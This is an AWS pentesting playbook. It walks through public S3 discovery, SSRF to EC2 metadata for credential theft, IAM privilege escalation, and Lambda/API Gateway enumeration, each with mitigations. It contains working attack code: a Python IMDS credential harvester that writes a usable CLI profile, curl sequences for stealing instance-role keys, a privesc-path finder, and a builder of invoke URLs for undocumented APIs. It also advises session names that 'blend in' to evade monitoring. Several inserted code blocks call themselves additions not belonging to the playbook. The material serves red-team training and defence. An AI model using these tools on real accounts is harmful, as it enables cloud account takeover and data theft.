AWS Cloud Pentesting Playbook

This playbook outlines foundational concepts of AWS architecture and provides technical guidance and attack strategies derived from practical labs and real-world exploitation scenarios. Each section includes purpose, context, exploitation techniques, AWS CLI commands, and mitigation strategies to guide red teamers, cloud security engineers, and blue teams.


1. AWS Cloud Architecture

Cloud Space Overview

Purpose: Understand AWS architectural layers and potential attack vectors.

  • Front-End: AWS Management Console (Web GUI), plus the CLI and SDKs, all of which drive the same API.

  • Control Plane: The AWS API that orchestrates services (e.g., EC2 start/stop, IAM configuration); every control-plane call is authenticated with IAM credentials and recorded by CloudTrail.

  • Data Plane: Hosts the actual data and compute resources (e.g., S3 objects, EC2 instances) and is reached through service-specific endpoints.

Security Insight:

  • Control Plane compromise = full account takeover.

  • Data Plane compromise = data exfiltration, service abuse.


2. Entry Point Identification

S3 Bucket Enumeration

Purpose: Identify buckets that an anonymous caller can list or read, and the data they leak.

Tools:

  • osint.sh (for domain/asset discovery)

  • cloud_enum (keyword-based discovery of buckets and other cloud assets)

Command:

cloud_enum -k examplecorp -l results.txt

Confirm each hit with an unsigned request: an anonymous GET on the bucket root that returns a ListBucketResult means anyone can list the bucket; a 403 means the bucket exists but listing is blocked; a 404 means the name is unused.

Example Attack:

http://public-examplecorp.s3.amazonaws.com/internal-ip.txt

Mitigation:

  • Turn on S3 Block Public Access at the account and bucket level; allow public access only where it is explicitly required.

  • Grant access through bucket policies scoped to specific principals, and disable ACLs (bucket-owner-enforced object ownership) so public ACLs cannot be set.
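The anonymous-listing check described above, as an added example that is not part of this playbook or of cloud_enum: a small Python helper that parses the ListBucketResult XML a public bucket returns and flags keys worth downloading. LISTING_XML is a constructed sample response; the bucket name, the keys and the "interesting" patterns are assumptions.

```python
"""Check whether an S3 bucket answers anonymous listing requests and pull out
keys worth looking at. Added example for this playbook, not a tool from it.
LISTING_XML is a constructed ListBucketResult response; bucket name and keys
are assumptions."""
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# S3 puts every element in this namespace; find() without it returns nothing.
S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"
# Assumed patterns for files that usually repay a closer look.
INTERESTING = re.compile(r"(\.env$|\.pem$|\.key$|credential|secret|backup|\.sql$|internal)", re.I)


def parse_listing(xml_text):
    """Return (bucket_name, [(key, size), ...]) from a ListBucketResult body."""
    root = ET.fromstring(xml_text)
    if root.tag != S3_NS + "ListBucketResult":
        raise ValueError(f"unexpected root element {root.tag}")
    name = root.findtext(S3_NS + "Name")
    keys = [(c.findtext(S3_NS + "Key"), int(c.findtext(S3_NS + "Size") or 0))
            for c in root.findall(S3_NS + "Contents")]
    return name, keys


def interesting_keys(keys):
    """Keys whose name matches one of the INTERESTING patterns, in listing order."""
    return [k for k, _ in keys if INTERESTING.search(k)]


def anonymous_listing(bucket, timeout=5):
    """Live check: an unsigned GET on the bucket root.
    200 + ListBucketResult means anyone can list; 403 means listing is blocked
    (the bucket exists); 404 means the bucket name is free."""
    url = f"https://{bucket}.s3.amazonaws.com/"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return "listable", parse_listing(resp.read().decode())
    except urllib.error.HTTPError as e:
        return f"http-{e.code}", None
    except urllib.error.URLError:
        return "unreachable", None


# Constructed sample of what a public bucket returns on GET / (not real data).
LISTING_XML = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>public-examplecorp</Name><Prefix></Prefix><KeyCount>4</KeyCount>
  <Contents><Key>logo.png</Key><Size>2048</Size></Contents>
  <Contents><Key>internal-ip.txt</Key><Size>512</Size></Contents>
  <Contents><Key>backup/db-2024.sql</Key><Size>1048576</Size></Contents>
  <Contents><Key>config/.env</Key><Size>220</Size></Contents>
</ListBucketResult>"""

if __name__ == "__main__":
    name, keys = parse_listing(LISTING_XML)
    print(name, "->", interesting_keys(keys))
    # Against a live target (network access required):
    # print(anonymous_listing("public-examplecorp"))
```

The namespace handling is the part people get wrong: `root.find("Contents")` silently returns None on S3 output, so the helper prefixes every tag with S3_NS.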


3. SSRF to EC2 Metadata Extraction

Purpose: Abuse SSRF in an application running on EC2 to read the instance role's temporary credentials from the Instance Metadata Service (IMDS).

Target Endpoint: http://169.254.169.254/latest/meta-data/

Command Sequence (IMDSv1; every step is a plain GET, which is why it is reachable through most SSRF bugs):

curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

The last response is JSON with AccessKeyId, SecretAccessKey, Token and Expiration; all three values are required to use the credentials (see section 4).

Mitigation:

  • Require IMDSv2 (HttpTokens=required). Every read then needs a session token that is obtained with a PUT request carrying a custom header, which a typical SSRF cannot send; keep HttpPutResponseHopLimit at 1 so the token response cannot cross a second network hop (e.g., into a container).

  • Restrict outbound traffic from EC2 instances and attach only the minimum role the workload needs, so stolen credentials are worth less.
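What the credential response looks like and how it becomes a CLI profile, as an added example that is not code from this playbook: a Python harvester that does the IMDSv2 token request when run on an instance, parses the security-credentials JSON, checks the key prefix (this also covers the AKIA/ASIA distinction in section 6 and the profile file format in section 4), and renders the ~/.aws/credentials section. SAMPLE_IMDS_RESPONSE is a constructed response with placeholder key values; the role name web-role and the profile name are assumptions.

```python
"""Harvest EC2 instance-role credentials from IMDS and turn them into an AWS CLI
profile. Added example for this playbook, not AWS tooling. SAMPLE_IMDS_RESPONSE
is constructed; the role name 'web-role' and the profile name are assumptions."""
import json
import urllib.request

IMDS = "http://169.254.169.254"


def imds_v2_token(ttl=21600):
    """IMDSv2 step one: a PUT with a custom header. Most SSRF bugs cannot do this."""
    req = urllib.request.Request(IMDS + "/latest/api/token", method="PUT")
    req.add_header("X-aws-ec2-metadata-token-ttl-seconds", str(ttl))
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()


def imds_get(path, token=None, timeout=2):
    """GET an IMDS path. With a token this is an IMDSv2 call, without it IMDSv1."""
    req = urllib.request.Request(IMDS + path)
    if token:
        req.add_header("X-aws-ec2-metadata-token", token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def key_kind(access_key_id):
    """AKIA = long-term IAM user key; ASIA = temporary STS credentials, which are
    only valid together with their session token."""
    if access_key_id.startswith("AKIA"):
        return "long-term"
    if access_key_id.startswith("ASIA"):
        return "temporary"
    return "unknown"


def parse_security_credentials(body):
    """Parse the JSON from /latest/meta-data/iam/security-credentials/<role>."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError(f"IMDS returned Code={doc.get('Code')!r}")
    creds = {
        "aws_access_key_id": doc["AccessKeyId"],
        "aws_secret_access_key": doc["SecretAccessKey"],
        "aws_session_token": doc["Token"],
        "expiration": doc["Expiration"],
    }
    if key_kind(creds["aws_access_key_id"]) != "temporary":
        raise ValueError("instance-role credentials should be ASIA* temporary keys")
    return creds


def render_profile(creds, name="pentest-profile"):
    """Render a ~/.aws/credentials section; the session token line is mandatory."""
    return (
        f"[{name}]\n"
        f"aws_access_key_id = {creds['aws_access_key_id']}\n"
        f"aws_secret_access_key = {creds['aws_secret_access_key']}\n"
        f"aws_session_token = {creds['aws_session_token']}\n"
    )


def harvest(role_name="web-role", use_v2=True):
    """Live path: fetch the role's credentials from IMDS (only works on EC2)."""
    token = imds_v2_token() if use_v2 else None
    body = imds_get(f"/latest/meta-data/iam/security-credentials/{role_name}", token)
    return render_profile(parse_security_credentials(body))


# Constructed sample shaped like the IMDS response; the values are placeholders.
SAMPLE_IMDS_RESPONSE = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE12",
    "SecretAccessKey": "exampleSecretKeyDoNotUse",
    "Token": "exampleSessionToken",
    "Expiration": "2024-01-01T06:00:00Z",
})

if __name__ == "__main__":
    try:
        print(harvest())
    except OSError:  # not on EC2, or IMDS unreachable: use the constructed sample
        print(render_profile(parse_security_credentials(SAMPLE_IMDS_RESPONSE)))
```

Run it on an instance and it prints a ready-to-paste profile; anywhere else the network call fails and it falls back to the sample, which is enough to see the file format and the Expiration field you must watch (the credentials stop working at that time, so re-harvest before then).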


4. Credential Injection and Identity Confirmation

Using Leaked/Extracted Credentials

Setup Profile:

aws configure --profile pentest-profile

Or edit ~/.aws/credentials:

[pentest-profile]
aws_access_key_id = AKIA...
aws_secret_access_key = ...
aws_session_token = ...

Verify Identity:

aws sts get-caller-identity --profile pentest-profile

Mitigation:

  • Alert on sts:GetCallerIdentity and other API calls from unexpected source IPs or user agents. GetCallerIdentity needs no IAM permissions and cannot be denied, so it is the first call a tester makes with any stolen key; it is still recorded in CloudTrail.

  • Rotate long-term keys regularly and prefer short-lived STS credentials so leaked keys expire on their own.


5. IAM Enumeration

Purpose: Discover all user/group/role/policy relationships.

Commands:

aws iam get-user --profile pentest-profile
aws iam list-groups-for-user --user-name dev-user --profile pentest-profile
aws iam list-roles --profile pentest-profile
aws iam list-attached-user-policies --user-name dev-user --profile pentest-profile
aws iam list-user-policies --user-name dev-user --profile pentest-profile
aws iam get-user-policy --user-name dev-user --policy-name DevPolicy --profile pentest-profile

Mitigation:

  • Regularly audit users and their permissions.

  • Restrict over-privileged accounts.


6. AWS Credential Types

Long-Term vs Short-Term Keys

Identification:

echo $AWS_ACCESS_KEY_ID
# AKIA → Long-term IAM user key (no session token; valid until rotated or deleted)
# ASIA → Temporary STS credentials (only valid with the matching session token, until Expiration)

Mitigation:

  • Use IAM roles and short-term credentials; a leaked ASIA key is useless once it expires, a leaked AKIA key works until someone notices.

  • Avoid hardcoding credentials in code, user-data, container images or config files.


7. Privilege Escalation Techniques

1. Create New Policy Version

iam:CreatePolicyVersion

Attack: Create a new version of a managed policy that is attached to your own principal, containing a permissive statement, and set it as the default version. The previous version stays in place, so the change is easy to miss in a review.

2. Pass Existing Role to EC2

iam:PassRole + ec2:RunInstances

Attack: Launch an EC2 instance with a higher-privileged instance profile, then read that role's credentials from IMDS (section 3) or run commands through user-data.

3. Attach Policy to Self

iam:AttachUserPolicy, iam:AttachGroupPolicy, iam:AttachRolePolicy

Attack: Attach AdministratorAccess (or any broader managed policy) to your own user, to a group you belong to, or to a role you can already assume.

4. Modify Trust Policy

iam:UpdateAssumeRolePolicy

Attack: Rewrite a privileged role's trust policy so that your principal is allowed to call sts:AssumeRole on it.

In every case an explicit Deny anywhere in the principal's policies, permission boundary or SCPs wins over the Allow, so check for Deny statements before concluding a path is open.

Mitigation (all):

  • Restrict these IAM actions with permission boundaries and SCPs, and scope iam:PassRole to specific role ARNs rather than "*".

  • Alert on CloudTrail events for CreatePolicyVersion with setAsDefault, Attach*Policy and UpdateAssumeRolePolicy, and on RunInstances calls that pass an instance profile.
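A way to check, offline, which of the four paths above a principal's policies actually grant, as an added example that is not code from this playbook or from any AWS tool: the policy documents you collected with the section 5 commands are evaluated for the required actions, honouring wildcards and explicit Deny. DEV_POLICY is a constructed policy document shaped like `aws iam get-policy-version` output; the account id and policy contents are assumptions, and resource scoping and conditions are deliberately not evaluated, so a hit is a candidate to confirm rather than proof.

```python
"""Offline check of which privilege-escalation primitives from this section an
IAM principal's policies grant. Added example for this playbook (not AWS's or
any tool's code). DEV_POLICY is constructed; the account id is an assumption."""
import fnmatch

# Escalation paths described above: every listed action must be allowed.
PRIVESC_PATHS = {
    "create-policy-version": ["iam:CreatePolicyVersion"],
    "pass-role-to-ec2": ["iam:PassRole", "ec2:RunInstances"],
    "attach-user-policy": ["iam:AttachUserPolicy"],
    "attach-group-policy": ["iam:AttachGroupPolicy"],
    "attach-role-policy": ["iam:AttachRolePolicy"],
    "update-trust-policy": ["iam:UpdateAssumeRolePolicy"],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    # IAM action names are case-insensitive and patterns may use '*' and '?'.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def statement_decisions(policies, action):
    """Return (allowed, denied) for one action across all policy documents.
    NotAction, Resource and Condition are ignored, so an Allow here means
    'worth trying', not 'guaranteed to succeed'."""
    allowed = denied = False
    for doc in policies:
        for stmt in _as_list(doc.get("Statement", [])):
            if "Action" not in stmt:
                continue
            if any(_matches(p, action) for p in _as_list(stmt["Action"])):
                if stmt.get("Effect") == "Allow":
                    allowed = True
                elif stmt.get("Effect") == "Deny":
                    denied = True
    return allowed, denied


def effective_allow(policies, action):
    allowed, denied = statement_decisions(policies, action)
    return allowed and not denied  # an explicit Deny always wins


def find_privesc_paths(policies):
    """Names of escalation paths whose required actions are all effectively allowed."""
    return sorted(
        name for name, actions in PRIVESC_PATHS.items()
        if all(effective_allow(policies, a) for a in actions)
    )


# Constructed sample: what an over-permissive 'DevPolicy' might look like.
DEV_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ec2:*", "iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:UpdateAssumeRolePolicy", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for path in find_privesc_paths([DEV_POLICY]):
        print("candidate privesc path:", path)
```

Feed it every document that applies to the principal (inline and attached user policies, the policies of each group, and the permission boundary if one is set); leaving a Deny-carrying document out is the usual way to get a false positive.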


8. API Gateway & Lambda Enumeration

Concept: Using Read-Only Permissions to Enumerate and Access Internal APIs

Step-by-Step Exploitation:

  1. Identify current user:

aws iam get-user --profile pentest-profile

  2. List attached user policies:

aws iam list-attached-user-policies --user-name <username> --profile pentest-profile

  3. Get policy ARN and version:

aws iam get-policy --policy-arn arn:aws:iam::<account>:policy/<policy-name> --profile pentest-profile
aws iam get-policy-version --policy-arn arn:aws:iam::<account>:policy/<policy-name> --version-id <version-id> --profile pentest-profile

get-policy returns the DefaultVersionId to pass as --version-id. In the policy document, look for apigateway:GET and lambda:Get*/List* permissions.

  4. List Lambda functions:

aws lambda list-functions --region us-west-2 --profile pentest-profile

  5. Get the Lambda resource policy (who may invoke the function; not to be confused with its execution role):

aws lambda get-policy --function-name <function-name> --region us-west-2 --profile pentest-profile

The AWS:SourceArn condition in that policy reveals the execute-api ARN of the API Gateway allowed to invoke the function, in the form arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<method>/<resource>. The <api-id> segment is the rest-api-id used in the next step, and a "*" stage means the stages still have to be enumerated.

  6. Get API Gateway stages:

aws apigateway get-stages --rest-api-id <api-id> --region us-west-2 --profile pentest-profile

  7. Visit discovered endpoint:

https://<api-id>.execute-api.us-west-2.amazonaws.com/<stage>/<resource>
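Steps 5 to 7 in code, as an added example that is not part of this playbook: a Python helper that reads the JSON-inside-JSON structure `aws lambda get-policy` returns, extracts the execute-api source ARNs, and builds the invoke URLs, expanding a "*" stage with the stage names from `get-stages`. GET_POLICY_OUTPUT is a constructed get-policy result; the api-id a1b2c3d4e5, the account id, the function name and the stage names are assumptions.

```python
"""Turn the execute-api ARN in a Lambda resource policy into the API Gateway URL
to try. Added example for this playbook, not AWS code. GET_POLICY_OUTPUT is a
constructed `aws lambda get-policy` result; api-id, account and stages are
assumptions."""
import json
import re

# arn:aws:execute-api:REGION:ACCOUNT:API-ID/STAGE/METHOD/RESOURCE-PATH
EXECUTE_API_ARN = re.compile(
    r"^arn:aws:execute-api:(?P<region>[a-z0-9-]+):(?P<account>\d{12}|\*):"
    r"(?P<api_id>[a-z0-9]+)/(?P<stage>[^/]+)/(?P<method>[^/]+)(?P<path>/.*)?$"
)


def parse_execute_api_arn(arn):
    """Split an execute-api ARN into its region, account, api_id, stage, method, path."""
    m = EXECUTE_API_ARN.match(arn)
    if not m:
        raise ValueError(f"not an execute-api ARN: {arn}")
    parts = m.groupdict()
    parts["path"] = parts["path"] or "/"
    return parts


def api_sources_from_lambda_policy(get_policy_output):
    """Yield the execute-api source ARNs allowed to invoke the function.
    get-policy returns the policy document as a JSON *string* inside JSON."""
    policy = json.loads(json.loads(get_policy_output)["Policy"])
    stmts = policy.get("Statement", [])
    for stmt in stmts if isinstance(stmts, list) else [stmts]:
        principal = stmt.get("Principal", {})
        if isinstance(principal, dict) and principal.get("Service") != "apigateway.amazonaws.com":
            continue
        cond = stmt.get("Condition", {})
        for key in ("ArnLike", "ArnEquals"):
            src = cond.get(key, {}).get("AWS:SourceArn")
            if src:
                yield src


def invoke_urls(get_policy_output, stages=None):
    """Return (method, url) pairs. A '*' stage in the ARN is expanded with `stages`
    (from `aws apigateway get-stages`); a '*' method means any HTTP verb."""
    urls = []
    for arn in api_sources_from_lambda_policy(get_policy_output):
        p = parse_execute_api_arn(arn)
        stage_list = (stages or ["<stage>"]) if p["stage"] == "*" else [p["stage"]]
        for stage in stage_list:
            host = f"{p['api_id']}.execute-api.{p['region']}.amazonaws.com"
            urls.append((p["method"], f"https://{host}/{stage}{p['path']}"))
    return urls


# Constructed sample shaped like `aws lambda get-policy --function-name internal-api`.
GET_POLICY_OUTPUT = json.dumps({
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Id": "default",
        "Statement": [{
            "Sid": "apigw-invoke",
            "Effect": "Allow",
            "Principal": {"Service": "apigateway.amazonaws.com"},
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:us-west-2:123456789012:function:internal-api",
            "Condition": {"ArnLike": {"AWS:SourceArn":
                "arn:aws:execute-api:us-west-2:123456789012:a1b2c3d4e5/*/GET/internal/users"}},
        }],
    }),
    "RevisionId": "00000000-0000-0000-0000-000000000000",
})

if __name__ == "__main__":
    for method, url in invoke_urls(GET_POLICY_OUTPUT, stages=["prod", "dev"]):
        print(method, url)
```

The double `json.loads` is the detail that trips people up when scripting this step; the rest is string assembly, but doing it from the ARN avoids guessing paths that the policy already spells out.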

Security Insight:

  • Chained enumeration of Lambda policies and API Gateway resources allows attackers to invoke undocumented APIs.

  • Least privilege IAM roles and separation of read/write policies are critical.


9. Key Attack Scenarios Summary

  Attack Vector                      | Tools/Technique        | Goal
  -----------------------------------+------------------------+--------------------------------------
  Public S3 Buckets                  | cloud_enum             | Find leaked configs/creds
  SSRF to Metadata                   | curl, web exploit      | Extract STS creds
  IAM Enumeration & Abuse            | aws iam list-*         | Discover and misuse privileges
  Abusing STS Temporary Tokens       | aws sts                | Lateral movement
  Misconfigured Trust Relationships  | AssumeRole abuse       | Privileged role pivoting
  Lambda Exposure via API Gateway    | apigateway, lambda CLI | Discover and invoke hidden resources


10. AWS Services Recap (Security Lens)

IAM

  • Central identity system.

  • Monitor role assumptions.

  • Use permission boundaries and SCPs.

EC2

  • Protect metadata service (IMDSv2).

  • Monitor user-data for secrets.

S3

  • Disable public buckets.

  • Enforce bucket policies and access logs.

Lambda

  • Lock down execution policies.

  • Avoid wide API Gateway access.

API Gateway

  • Monitor stage and resource exposure.

  • Validate CORS and auth settings.

CloudTrail & GuardDuty

  • Enable full logging (all regions, management events, plus S3 and Lambda data events where the cost is acceptable) and protect the trail bucket from the accounts it logs.

  • Alert on anomalous API usage: sts:AssumeRole into privileged roles, iam:CreatePolicyVersion, iam:UpdateAssumeRolePolicy, iam:Attach*Policy, and ec2:RunInstances that passes an instance profile. iam:PassRole does not produce an event of its own; the call that consumed the role is what appears in the trail.
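The alerting rules above run over sample CloudTrail records, as an added example that is not GuardDuty or AWS code: a Python classifier that flags the escalation and pivot events from sections 7 and 11, treats an AccessDenied attempt as a low-severity signal rather than noise, and shows why RunInstances (not PassRole) is the event to watch for role passing. SAMPLE_RECORDS are constructed records trimmed to the fields used; the user, role and policy names are assumptions.

```python
"""Detection logic over CloudTrail records for the privilege-escalation and pivot
actions named in this playbook. Added example, not AWS or GuardDuty code.
SAMPLE_RECORDS are constructed; user, role and policy names are assumptions."""
import json

# (eventSource, eventName) pairs to alert on, with the request field that names
# the thing being changed.
HIGH_RISK = {
    ("iam.amazonaws.com", "CreatePolicyVersion"): "policyArn",
    ("iam.amazonaws.com", "UpdateAssumeRolePolicy"): "roleName",
    ("iam.amazonaws.com", "AttachUserPolicy"): "policyArn",
    ("iam.amazonaws.com", "AttachGroupPolicy"): "policyArn",
    ("iam.amazonaws.com", "AttachRolePolicy"): "policyArn",
}


def actor(record):
    ident = record.get("userIdentity", {})
    return ident.get("arn") or ident.get("principalId", "?")


def classify(record):
    """Return an alert dict for a risky record, or None.
    iam:PassRole never appears as its own event; the consuming call (here
    RunInstances with an iamInstanceProfile) is what the trail records."""
    name = record.get("eventName", "?")
    if record.get("errorCode"):  # a denied attempt is still an attacker probing
        return {"severity": "low", "rule": "denied-" + name,
                "actor": actor(record), "detail": record["errorCode"]}
    key = (record.get("eventSource"), name)
    params = record.get("requestParameters") or {}
    if key in HIGH_RISK:
        detail = params.get(HIGH_RISK[key])
        if name == "CreatePolicyVersion" and params.get("setAsDefault"):
            detail = f"{detail} (set as default)"
        return {"severity": "high", "rule": name, "actor": actor(record), "detail": detail}
    if key == ("ec2.amazonaws.com", "RunInstances") and params.get("iamInstanceProfile"):
        prof = params["iamInstanceProfile"]
        return {"severity": "high", "rule": "RunInstances-with-role",
                "actor": actor(record), "detail": prof.get("arn") or prof.get("name")}
    if key == ("sts.amazonaws.com", "AssumeRole"):
        return {"severity": "medium", "rule": "AssumeRole",
                "actor": actor(record), "detail": params.get("roleArn")}
    return None


def scan(records):
    """Alerts for every record that matches a rule, in input order."""
    return [a for a in (classify(r) for r in records) if a]


DEV_USER = {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/dev-user"}

# Constructed CloudTrail records, trimmed to the fields used above.
SAMPLE_RECORDS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
     "userIdentity": DEV_USER,
     "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/DevPolicy",
                           "setAsDefault": True}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "RunInstances",
     "userIdentity": DEV_USER,
     "requestParameters": {"instanceType": "t3.micro", "iamInstanceProfile":
                           {"arn": "arn:aws:iam::123456789012:instance-profile/admin-profile"}}},
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
     "userIdentity": DEV_USER,
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/admin-role",
                           "roleSessionName": "x"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy",
     "errorCode": "AccessDenied", "userIdentity": DEV_USER,
     "requestParameters": {"roleName": "admin-role"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": DEV_USER},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(json.dumps(alert))
```

The same four records in sequence (new policy version, instance launched with an admin profile, role assumed, trust-policy edit refused) are the textbook shape of section 7; correlating by actor over a short window is the next step a real rule would take.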


11. AWS Pentesting Flow Summary

Reconnaissance

  • Tools: cloud_enum, osint.sh, aws sts get-caller-identity (the AWS equivalent of whoami)

  • Targets: IAM users, S3, EC2 metadata, Lambda/APIGW

Exploitation

  • SSRF → Metadata → STS tokens

  • IAM → Privilege escalation

Post-Exploitation

  • Use AWS CLI for enumeration

  • Dump data (S3), invoke functions (Lambda), pivot roles (STS)

Lateral Movement

  • Abuse trust policies that let your principal (or an account you control) assume more privileged roles

  • Pivot with aws sts assume-role; each AssumeRole is recorded in CloudTrail under sts.amazonaws.com, so choose role session names that blend in and expect the pivot to be visible to a monitored account


End of Playbook

This playbook emphasizes both offensive and defensive approaches to AWS environments. Proper hardening, monitoring, and the principle of least privilege are key to reducing attack surfaces.
